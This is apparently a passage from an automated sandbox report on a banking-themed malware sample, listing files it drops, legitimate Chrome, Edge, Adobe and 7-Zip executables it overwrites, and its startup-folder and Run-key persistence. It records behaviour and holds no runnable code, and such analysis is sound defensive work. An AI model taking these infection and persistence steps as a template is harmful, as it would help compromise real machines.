Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\Locator.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File created: C:\Windows\System32\AppVClient.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\FXSSVC.exe Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File created: C:\Windows\System32\alg.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\SysWOW64\perfhost.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\msiexec.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\SensorDataService.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\msdtc.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\differences\niellist.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 0_2_00AFCBD0
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Users\user\AppData\Roaming\a8259331cca430bb.bin offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Users\user\AppData\Local\Temp\aut9353.tmp offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Users\user\AppData\Local\Temp\aut9353.tmp offset: 520192
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Users\user\AppData\Local\Temp\unnervousness offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 95744
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 669260
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 672768
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 1220608
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 1221632
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 1224840
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 669184
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 53125
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Users\user\AppData\Local\differences\niellist.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 767488
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 1341004
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 1344512
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 1347720
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 1340928
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe File written: C:\Windows\System32\AppVClient.exe offset: 409168
Source: C:\Windows\System32\alg.exe File written: C:\Windows\System32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2136576
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2710092
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 2710016
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 1093484
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7z.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7z.exe offset: 557056
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7z.exe offset: 1130572
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7z.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7z.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7z.exe offset: 1130496
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7z.exe offset: 382726
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7z.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zFM.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zFM.exe offset: 952832
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526348
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zFM.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zFM.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526272
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zFM.exe offset: 614020
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zFM.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zG.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zG.exe offset: 700416
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zG.exe offset: 1273932
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zG.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zG.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zG.exe offset: 1273856
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zG.exe offset: 464916
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\7zG.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176 Jump to behavior
